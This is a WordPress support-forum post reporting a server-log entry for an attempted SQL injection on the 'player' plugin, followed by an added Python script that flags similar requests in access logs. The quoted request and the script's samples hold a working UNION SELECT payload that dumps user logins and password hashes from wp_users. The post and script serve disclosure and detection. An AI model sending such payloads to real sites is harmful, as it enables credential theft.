Title: GET request vulnerability?
Last modified: August 21, 2016

---

# GET request vulnerability?

 *  [carbeck](https://wordpress.org/support/users/carbeck/)
 * (@carbeck)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/get-request-vulnerability/)
 * Hi there,
 * I don’t use this plugin for my own site, but I found this line in my server log
   today:
 * > 27.155.*.* – – [26/Apr/2013:21:36:44 +0000] “GET /wp-content/plugins/player/
   > settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,
   > 0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52
   > +from+wp_users– HTTP/1.0” 403 1090 “-” “-“
 * Clearly, someone tried to exploit WordPress using this plugin so that a list
   of users and passwords would get returned. I don’t know if this vulnerability
   has been fixed already; I just wanted to make sure it doesn’t go unnoticed in
   any case.
 * The request was blocked by Bad Behavior for “URL pattern found on blacklist”;
   the assault came from China.
 * [http://wordpress.org/extend/plugins/player/](http://wordpress.org/extend/plugins/player/)
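
An added example, not part of the original post or of the plugin's code: a Python triage script that parses access-log lines like the one quoted above, URL-decodes each query parameter, and flags SQL injection markers along with whether the server answered with a 2xx status. The regexes, function names, and the second and third sample lines are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common/combined log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Markers taken from the request in the post, matched after URL decoding.
SQLI_RE = re.compile(r'\bunion\b.+?\bselect\b|\bgroup_concat\s*\(|\buser_pass\b',
                     re.IGNORECASE | re.DOTALL)

def scan_line(line):
    """Return a finding dict if a query parameter looks like SQL injection, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qsl decodes %xx escapes and turns '+' into spaces before matching
    hits = [name for name, value in parse_qsl(url.query, keep_blank_values=True)
            if SQLI_RE.search(value)]
    if not hits:
        return None
    status = int(m["status"])
    # A 2xx status means the application answered the request instead of a filter
    # rejecting it, so those findings need follow-up first.
    return {"host": m["host"], "path": url.path, "params": hits,
            "status": status, "served": 200 <= status < 300}

# Constructed sample log. The first line is the request from the post with the
# column list shortened and typographic quotes and dashes normalised to ASCII;
# the other two lines and their addresses are invented for illustration.
SAMPLE_LOG = [
    '27.155.*.* - - [26/Apr/2013:21:36:44 +0000] "GET /wp-content/plugins/player/'
    'settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,'
    '0x3a,user_pass%29,5+from+wp_users-- HTTP/1.0" 403 1090 "-" "-"',
    '203.0.113.7 - - [26/Apr/2013:21:40:02 +0000] "GET /wp-content/plugins/player/'
    'settings.php?playlist=2&theme=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [26/Apr/2013:21:41:10 +0000] "GET /wp-content/plugins/player/'
    'settings.php?theme=1%20UnIoN%20SeLeCt%20user_pass HTTP/1.1" 200 812 "-" "-"',
]

def scan(lines):
    """Scan an iterable of log lines and return the list of findings."""
    return [f for f in map(scan_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The pattern is a triage heuristic for reviewing logs, so expect false positives on ordinary text that happens to contain the same words.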

The topic ‘GET request vulnerability?’ is closed to new replies.


 * 0 replies
 * 1 participant
 * Last reply from: [carbeck](https://wordpress.org/support/users/carbeck/)
 * Last activity: [13 years, 1 month ago](https://wordpress.org/support/topic/get-request-vulnerability/)
 * Status: not resolved